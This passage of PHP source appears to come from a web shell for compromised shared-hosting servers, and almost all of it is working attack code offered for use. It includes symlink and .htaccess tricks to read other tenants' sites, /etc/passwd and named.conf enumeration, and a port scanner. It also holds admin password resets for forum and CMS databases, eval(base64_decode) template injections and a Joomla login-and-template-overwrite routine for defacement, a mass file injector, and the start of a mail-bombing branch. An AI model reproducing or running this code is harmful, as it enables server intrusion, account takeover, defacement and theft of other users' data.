1461 else $file="";
1462
1463 if(empty($file))
1464 exit;
1465
1466 if(!is_writable("."))
1467 echo "not writable directory";
1468
1469 $level=0;
1470
1471 for($as=0;$as<$fakedep;$as++)
1472 {
1473 if(!file_exists($fakedir))
1474 mkdir($fakedir);
1475 chdir($fakedir);
1476 }
1477
1478 while(1<$as--) chdir("..");
1479
1480 $hardstyle = explode("/", $file);
1481
1482 for($a=0;$a<count($hardstyle);$a++)
1483 {
1484 if(!empty($hardstyle[$a]))
1485 {
1486 if(!file_exists($hardstyle[$a]))
1487 mkdir($hardstyle[$a]);
1488 chdir($hardstyle[$a]);
1489 $as++;
1490 }
1491 }
1492 $as++;
1493 while($as--)
1494 chdir("..");
1495
1496 @rmdir("fakesymlink");
1497 @unlink("fakesymlink");
1498
1499 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
1500
1501 while(1)
1502 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
1503 else $num++;
1504
1505 @unlink("fakesymlink");
1506 mkdir("fakesymlink");
1507
1508 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
1509 }
1510 else
1511 echo '<CENTER>Cannot Create Symlink</CENTER>';
1512}
1513else if(isset($_REQUEST['404new']))
1514{
1515 ?>
1516 <form>
1517 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
1518 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
1519 </br>
1520 </form>
1521 <?php
1522}
1523else if(isset($_REQUEST['404page']))
1524{
1525 $url = $_SERVER['REQUEST_URI'];
1526 $path=explode('/',$url);
1527 $url =str_replace($path[count($path)-1],'',$url);
1528 if(isset($_POST['message']))
1529 {
1530 if($myfile = fopen(".htaccess", "a"))
1531 {
1532 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
1533 if($myfilee = fopen("404.html", "w+"))
1534 {
1535 fwrite($myfilee, $_POST['message']);
1536 }
1537 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1538 }
1539 else
1540 echo "<center>Cannot Set 404 Page</center>";
1541 }
1542 else if(strlen($ind) != 0)
1543 {
1544 if($myfile = fopen(".htaccess", "a"))
1545 {
1546 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
1547
1548 if($myfilee = fopen("404.html", "w+"))
1549 {
1550 fwrite($myfilee, base64_decode($ind));
1551
1552 fclose($myfilee);
1553 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1554 }
1555 fclose($myfile);
1556 }
1557 else
1558 {
1559 echo "<center>Cannot Set 404 Page</center>";
1560 }
1561 }
1562 else
1563 echo "<center>Nothing Specified in the shell</center>";
1564}
1565else if(isset($_GET["domains"]))
1566{
1567 ?><center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center><?php
1568}
1569else if(isset($_GET["symlink"]))
1570{
1571 $d0mains = @file("/etc/named.conf");
1572 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1573 $path=explode('/',$url);
1574 $url =str_replace($path[count($path)-1],'',$url);
1575 if($d0mains)
1576 {
1577 @mkdir("dhanush",0777);
1578 @chdir("dhanush");
1579 execmd("ln -s / root");
1580 $file3 = 'Options all
1581 DirectoryIndex Sux.html
1582 AddType text/plain .php
1583 AddHandler server-parsed .php
1584 AddType text/plain .html
1585 AddHandler txt .html
1586 Require None
1587 Satisfy Any
1588 ';
1589 $fp3 = fopen('.htaccess','w');
1590 $fw3 = fwrite($fp3,$file3);
1591 @fclose($fp3);
1592 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
1593
1594 $dcount = 1;
1595 foreach($d0mains as $d0main)
1596 {
1597 if(eregi("zone",$d0main))
1598 {
1599 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1600 flush();
1601
1602 if(strlen(trim($domains[1][0])) > 2)
1603 {
1604 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1605
1606 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
1607 $dcount++;
1608 }
1609 }
1610
1611 }
1612 echo "</table>";
1613 }
1614 else
1615 {
1616 if(stristr(php_uname(),"Linux"))
1617 {
1618 ?>
1619 <div style="float:left;position:fixed;">
1620 <form>
1621 <table cellpadding="9">
1622 <tr>
1623 <th colspan="2">Get User Name</th>
1624 </tr>
1625 <tr>
1626 <td>Enter Website Name :</td>
1627 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
1628 </tr>
1629 <tr>
1630 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
1631 </tr>
1632 <tr>
1633 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
1634 </tr>
1635 </table>
1636 </form>
1637 </div>
1638 <?php
1639 $TEST=@file('/etc/passwd');
1640 if ($TEST)
1641 {
1642 @mkdir("dhanush",0777);
1643 @chdir("dhanush");
1644 execmd("ln -s / root");
1645 $file3 = 'Options all
1646 DirectoryIndex Sux.html
1647 AddType text/plain .php
1648 AddHandler server-parsed .php
1649 AddType text/plain .html
1650 AddHandler txt .html
1651 Require None
1652 Satisfy Any
1653 ';
1654 $fp3 = fopen('.htaccess','w');
1655 $fw3 = fwrite($fp3,$file3);
1656 @fclose($fp3);
1657
1658 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1659
1660 $dcount = 1;
1661 $file = fopen("/etc/passwd", "r");
1662 //Output a line of the file until the end is reached
1663 while(!feof($file))
1664 {
1665 $s = fgets($file);
1666 $matches = array();
1667 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1668 $matches = str_replace("home/","",$matches[1]);
1669 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1670 continue;
1671 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1672 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1673 $dcount++;
1674 }
1675 fclose($file);
1676
1677 echo "</table>";
1678 }
1679 else
1680 {
1681 @mkdir("dhanush",0777);
1682 @chdir("dhanush");
1683 execmd("ln -s / root");
1684 $file3 = 'Options all
1685 DirectoryIndex Sux.html
1686 AddType text/plain .php
1687 AddHandler server-parsed .php
1688 AddType text/plain .html
1689 AddHandler txt .html
1690 Require None
1691 Satisfy Any
1692 ';
1693 $fp3 = fopen('.htaccess','w');
1694 $fw3 = fwrite($fp3,$file3);
1695 @fclose($fp3);
1696
1697 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1698
1699 $temp = "";
1700 $val1 = 0;
1701 $val2 = 1000;
1702 for(;$val1 <= $val2;$val1++)
1703 {
1704 $uid = @posix_getpwuid($val1);
1705 if ($uid)
1706 $temp .= join(':',$uid)."\n";
1707 }
1708 echo '<br/>';
1709 $temp = trim($temp);
1710
1711 $file5 = fopen("test.txt","w");
1712 fputs($file5,$temp);
1713 fclose($file5);
1714
1715 $dcount = 1;
1716 $file = fopen("test.txt", "r");
1717 while(!feof($file))
1718 {
1719 $s = fgets($file);
1720 $matches = array();
1721 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1722 $matches = str_replace("home/","",$matches[1]);
1723 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1724 continue;
1725 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1726 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1727 $dcount++;
1728 }
1729 fclose($file);
1730 echo "</table>";
1731 unlink("test.txt");
1732 }
1733 }
1734 else
1735 echo "<center><font size=4 >Cannot create Symlink</font></center>";
1736 }
1737}
1738else if(isset($_GET['host']) && isset($_GET['protocol']))
1739{
1740 echo "Open Ports: ";
1741 $host = $_GET['host'];
1742 $proto = $_GET['protocol'];
1743 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
1744 for($current = 0; $current <= 23; $current++)
1745 {
1746 $currents = $myports[$current];
1747 $service = getservbyport($currents, $proto);
1748 // Try to connect to port
1749 $result = fsockopen($host, $currents, $errno, $errstr, 1);
1750 // Show results
1751 if($result)
1752 echo "<font class=txt>$currents, </font>";
1753 }
1754}
1755else if(isset($_REQUEST['forumpass']))
1756{
1757 $localhost = $_GET['f1'];
1758 $database = $_GET['f2'];
1759 $username = $_GET['f3'];
1760 $password = $_GET['f4'];
1761 $prefix = $_GET['prefix'];
1762 $newpass = $_GET['newpass'];
1763 $uid = $_GET['uid'];
1764
1765 if($_GET['forums'] == "vb")
1766 {
1767 $newpass = $_GET['newipbpass'];
1768 $uid = $_GET['ipbuid'];
1769 $con = mysql_connect($localhost,$username,$password);
1770 $db = mysql_select_db($database,$con);
1771 $salt = "eghjghrtd";
1772 $newpassword = md5(md5($newpass) . $salt);
1773 if($prefix == "" || $prefix == null)
1774 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1775 else
1776 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1777 if($sql)
1778 {
1779 mysql_close($con);
1780 echo "<font class=txt>Password Changed Successfully</font>";
1781 }
1782 else
1783 echo "Cannot Change Password";
1784 }
1785 else if($_GET['forums'] == "mybb")
1786 {
1787 $newpass = $_GET['newipbpass'];
1788 $uid = $_GET['ipbuid'];
1789 $con = mysql_connect($localhost,$username,$password);
1790 $db = mysql_select_db($database,$con);
1791 $salt = "jeghj";
1792 $newpassword = md5(md5($salt).md5($newpass));
1793 if($prefix == "" || $prefix == null)
1794 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1795 else
1796 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1797 if($sql)
1798 {
1799 mysql_close($con);
1800 echo "<font class=txt>Password Changed Successfully</font>";
1801 }
1802 else
1803 echo "Cannot Change Password";
1804 }
1805 else if($_GET['forums'] == "smf")
1806 {
1807 $newpass = $_GET['newipbpass'];
1808 $uid = $_GET['ipbuid'];
1809 $con = mysql_connect($localhost,$username,$password);
1810 $db = mysql_select_db($database,$con);
1811
1812 if($prefix == "" || $prefix == null)
1813 {
1814 $result = mysql_query("select member_name from smf_members where id_member = $uid");
1815 $row = mysql_fetch_array($result);
1816 $membername = $row['member_name'];
1817 $newpassword = sha1(strtolower($membername).$newpass);
1818 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
1819 }
1820 else
1821
1822 {
1823 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
1824 $row = mysql_fetch_array($result);
1825 $membername = $row['member_name'];
1826 $newpassword = sha1(strtolower($membername).$newpass);
1827 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
1828 }
1829 if($sql)
1830 {
1831 mysql_close($con);
1832 echo "<font class=txt>Password Changed Successfully</font>";
1833 }
1834 else
1835 echo "Cannot Change Password";
1836 }
1837 else if($_GET['forums'] == "phpbb")
1838 {
1839 $newpass = $_POST['newipbpass'];
1840 $uid = $_POST['ipbuid'];
1841 $con = mysql_connect($localhost,$username,$password);
1842 $db = mysql_select_db($database,$con);
1843
1844 $newpassword = md5($newpass);
1845 if(empty($prefix) || $prefix == null)
1846 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
1847 else
1848 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
1849 if($sql)
1850 {
1851 mysql_close($con);
1852 echo "<font class=txt>Password Changed Successfully</font>";
1853 }
1854 else
1855 echo "Cannot Change Password";
1856 }
1857 else if($_GET['forums'] == "ipb")
1858 {
1859 $newpass = $_POST['newipbpass'];
1860 $uid = $_POST['ipbuid'];
1861 $con = mysql_connect($localhost,$username,$password);
1862 $db = mysql_select_db($database,$con);
1863 $salt = "eghj";
1864 $newpassword = md5(md5($salt).md5($newpass));
1865 if($prefix == "" || $prefix == null)
1866 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1867 else
1868 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1869 if($sql)
1870 {
1871 mysql_close($con);
1872 echo "<font class=txt>Password Changed Successfully</font>";
1873 }
1874 else
1875 echo "Cannot Change Password";
1876 }
1877 else if($_GET['forums'] == "wp")
1878 {
1879 $uname = $_GET['uname'];
1880 $con = mysql_connect($localhost,$username,$password);
1881 $db = mysql_select_db($database,$con);
1882
1883 $newpassword = md5($newpass);
1884 if($prefix == "" || $prefix == null)
1885 $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1886 else
1887 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1888 if($sql)
1889 {
1890 mysql_close($con);
1891 echo "<font class=txt>Password Changed Successfully</font>";
1892 }
1893 else
1894 echo "Cannot Change Password";
1895 }
1896 else if($_GET['forums'] == "joomla")
1897 {
1898 $newjoomlapass = $_GET['newjoomlapass'];
1899 $joomlauname = $_GET['username'];
1900 $con = mysql_connect($localhost,$username,$password);
1901 $db = mysql_select_db($database,$con);
1902
1903 $newpassword = md5($newjoomlapass);
1904 if($prefix == "" || $prefix == null)
1905 $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'");
1906 else
1907 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'");
1908 if($sql)
1909 {
1910 mysql_close($con);
1911 echo "<font class=txt>Password Changed Successfully</font>";
1912 }
1913 else
1914 echo "Cannot Change Password";
1915 }
1916}
1917else if(isset($_POST['forumdeface']))
1918{
1919 $localhost = $_POST['f1'];
1920 $database = $_POST['f2'];
1921 $username = $_POST['f3'];
1922 $password = $_POST['f4'];
1923 $index = $_POST['index'];
1924 $prefix = $_POST['tableprefix'];
1925
1926 if($_POST['forumdeface'] == "vb")
1927 {
1928 $con =@ mysql_connect($localhost,$username,$password);
1929 $db =@ mysql_select_db($database,$con);
1930 $index=str_replace('"','\\"',$index);
1931 $attack = "{\${eval(base64_decode(\'";
1932 $attack .= base64_encode("echo \"$index\";");
1933 $attack .= "\'))}}{\${exit()}}</textarea>";
1934 if($prefix == "" || $prefix == null)
1935 $query = "UPDATE template SET template = '$attack'";
1936 else
1937 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1938 $result =@ mysql_query($query,$con);
1939 if($result)
1940 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
1941 else
1942 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
1943 }
1944 else if($_POST['forumdeface'] == "mybb")
1945 {
1946 $con =@ mysql_connect($localhost,$username,$password);
1947 $db =@ mysql_select_db($database,$con);
1948 $attack = "{\${eval(base64_decode(\'";
1949 $attack .= base64_encode("echo \"$index\";");
1950 $attack .= "\'))}}{\${exit()}}</textarea>";
1951 $attack = str_replace('"',"\\'",$attack);
1952
1953 if($prefix == "" || $prefix == null)
1954 $query = "UPDATE mybb_templates SET template = '$attack'";
1955 else
1956 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
1957 $result =@ mysql_query($query,$con);
1958 if($result)
1959 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
1960 else
1961 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
1962 }
1963 else if($_POST['forumdeface'] == "smf")
1964 {
1965 $head = $_POST['head'];
1966 $catid = $_POST['f5'];
1967
1968 $con =@ mysql_connect($localhost,$username,$password);
1969 $db =@ mysql_select_db($database,$con);
1970 if($prefix == "" || $prefix == null)
1971 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1972 else
1973 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1974 $result =@ mysql_query($query,$con);
1975 if($result)
1976 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
1977 else
1978 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
1979 }
1980 else if($_POST['forumdeface'] == "ipb")
1981 {
1982 $head = $_POST['head'];
1983 $catid = $_POST['f5'];
1984
1985 $IPB = "forums";
1986 $con =@ mysql_connect($localhost,$username,$password);
1987 $db =@ mysql_select_db($database,$con);
1988 if($prefix == "" || $prefix == null)
1989 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
1990 else
1991 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
1992 if($result)
1993 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
1994 else
1995 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
1996 }
1997 else if($_POST['forumdeface'] == "wp")
1998 {
1999 $catid = $_POST['f5'];
2000 $head = $_POST['head'];
2001
2002 $con =@ mysql_connect($localhost,$username,$password);
2003 $db =@ mysql_select_db($database,$con);
2004 if($prefix == "" || $prefix == null)
2005 {
2006 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2007 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'";
2008 else
2009 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2010 }
2011 else
2012 {
2013 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2014 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'";
2015 else
2016 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2017
2018 }
2019 $result =@mysql_query($query,$con) or mysql_error();
2020 if($result)
2021 echo "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
2022 else
2023 echo "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
2024 }
2025 else if($_POST['forumdeface'] == "joomla")
2026 {
2027 $site_url = $_POST['siteurl'];
2028 $dbprefix = $_POST['tableprefix'];
2029 $dbname = $_POST['f2'];
2030 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
2031
2032 function randomt()
2033 {
2034 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
2035 srand((double)microtime()*1000000);
2036 $i = 0;
2037 $pass = '' ;
2038
2039 while ($i <= 7)
2040 {
2041 $num = rand() % 33;
2042 $tmp = substr($chars, $num, 1);
2043 $pass = $pass . $tmp;
2044 $i++;
2045 }
2046
2047 return $pass;
2048 }
2049 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
2050 {
2051 $ar0=explode($marqueurDebutLien, $text);
2052 $ar1=explode($marqueurFinLien, $ar0[$i]);
2053 $ar=trim($ar1[0]);
2054 return $ar;
2055 }
2056 $co=randomt();
2057
2058 $link=mysql_connect($localhost,$username,$password) ;
2059 mysql_select_db($dbname,$link);
2060
2061 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
2062
2063 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
2064
2065 if ( $req )
2066 {
2067 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
2068 $data = mysql_fetch_array($req);
2069 $template_name=$data["template"];
2070
2071 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
2072 $data = mysql_fetch_array($req);
2073 $template_id=$data["extension_id"];
2074
2075 $url2=$site_url."/index.php";
2076
2077 $ch = curl_init();
2078 curl_setopt($ch, CURLOPT_URL, $url2);
2079 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2080 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2081 curl_setopt($ch, CURLOPT_HEADER, 1);
2082 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2083 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2084 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2085
2086
2087 $buffer = curl_exec($ch);
2088
2089 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
2090 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
2091
2092
2093 $url2=$site_url."/index.php";
2094 $ch = curl_init();
2095 curl_setopt($ch, CURLOPT_URL, $url2);
2096 curl_setopt($ch, CURLOPT_POST, 1);
2097 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
2098 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2099 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2100 curl_setopt($ch, CURLOPT_HEADER, 0);
2101 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2102 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2103 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2104 $buffer = curl_exec($ch);
2105
2106 $pos = strpos($buffer,"com_config");
2107 if($pos === false)
2108 {
2109 echo("<br>[-] Login Error");
2110 exit;
2111 }
2112
2113 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
2114 $ch = curl_init();
2115 curl_setopt($ch, CURLOPT_URL, $url2);
2116 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2117 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2118 curl_setopt($ch, CURLOPT_HEADER, 0);
2119 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2120 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2121
2122 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2123 $buffer = curl_exec($ch);
2124
2125 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
2126 if(!$hidden2)
2127 {
2128 echo("<br>[-] index.php Not found in Theme Editor");
2129 exit;
2130 }
2131
2132 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2133
2134 $ch = curl_init();
2135 curl_setopt($ch, CURLOPT_URL, $url2);
2136 curl_setopt($ch, CURLOPT_POST, 1);
2137 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
2138
2139 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2140 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2141 curl_setopt($ch, CURLOPT_HEADER, 0);
2142 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2143 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2144 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2145 $buffer = curl_exec($ch);
2146
2147 $pos = strpos($buffer,'<dd class="message message">');
2148 if($pos === false)
2149 {
2150 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2151 }
2152 else
2153 {
2154 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2155 }
2156 }
2157 else
2158 {
2159 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
2160 $data = mysql_fetch_array($req);
2161 $template_name=$data["template"];
2162
2163 $url2=$site_url."/index.php";
2164 $ch = curl_init();
2165 curl_setopt($ch, CURLOPT_URL, $url2);
2166 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2167 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2168 curl_setopt($ch, CURLOPT_HEADER, 1);
2169 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2170 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2171 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2172 $buffer = curl_exec($ch);
2173
2174 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
2175
2176 $url2=$site_url."/index.php";
2177 $ch = curl_init();
2178 curl_setopt($ch, CURLOPT_URL, $url2);
2179 curl_setopt($ch, CURLOPT_POST, 1);
2180 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
2181 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2182 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2183 curl_setopt($ch, CURLOPT_HEADER, 0);
2184 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2185 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2186 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2187 $buffer = curl_exec($ch);
2188
2189 $pos = strpos($buffer,"com_config");
2190
2191 if($pos === false)
2192 {
2193 echo("<br>[-] Login Error");
2194 exit;
2195 }
2196
2197 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
2198 $ch = curl_init();
2199 curl_setopt($ch, CURLOPT_URL, $url2);
2200 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2201 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2202 curl_setopt($ch, CURLOPT_HEADER, 0);
2203 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2204 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2205 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2206 $buffer = curl_exec($ch);
2207
2208 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
2209
2210 if(!$hidden2)
2211 {
2212 echo("<br>[-] index.php Not found in Theme Editor");
2213 }
2214
2215 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2216 $ch = curl_init();
2217 curl_setopt($ch, CURLOPT_URL, $url2);
2218 curl_setopt($ch, CURLOPT_POST, 1);
2219 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
2220 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2221 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2222 curl_setopt($ch, CURLOPT_HEADER, 0);
2223 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2224 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2225 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2226 $buffer = curl_exec($ch);
2227
2228 $pos = strpos($buffer,'<dd class="message message fade">');
2229 if($pos === false)
2230 {
2231 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2232 exit;
2233 }
2234 else
2235 {
2236 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2237 }
2238 }
2239 }
2240}
2241else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
2242{
2243 $filetype = $_POST['filetype'];
2244
2245 $mode = "a";
2246
2247 if($_POST['mode'] == 'Apender')
2248 $mode = "a";
2249
2250 if($_POST['mode'] == 'Overwriter')
2251 $mode = "w";
2252
2253 if (is_dir($_POST['pathtomass']))
2254 {
2255 $lolinject = $_POST['injectthis'];
2256 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
2257 if(substr($_POST['pathtomass'], -1) == "\\")
2258 $mypath = $_POST['pathtomass'] . "*.".$filetype;
2259 foreach (glob($mypath) as $injectj00)
2260 {
2261 if($injectj00 == __FILE__)
2262 continue;
2263 $fp=fopen($injectj00,$mode);
2264 if (fputs($fp,$lolinject))
2265 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
2266 else
2267 echo 'failed to inject '.$injectj00.'<br>';
2268 }
2269 }
2270 else
2271 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
2272}
2273else if(isset($_POST['mailfunction']))
2274{
2275 if($_POST['mailfunction'] == "dobombing")
